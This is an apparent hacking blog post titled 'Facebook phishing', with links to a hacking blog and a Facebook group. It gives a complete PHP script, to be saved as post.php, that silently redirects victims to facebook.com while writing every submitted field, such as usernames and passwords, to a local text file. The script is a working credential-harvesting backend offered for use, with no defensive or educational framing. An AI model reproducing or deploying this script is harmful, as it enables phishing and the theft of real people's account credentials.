Facebook phishing
For information go to http://www.hacrao.blogspot.com
https://www.facebook.com/groups/iamahacker/?notif_t=group_activity
<?php
header("Location: http://www.facebook.com/");
$handle = fopen("raosrulez.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it as "post.php"
No comments:
Post a Comment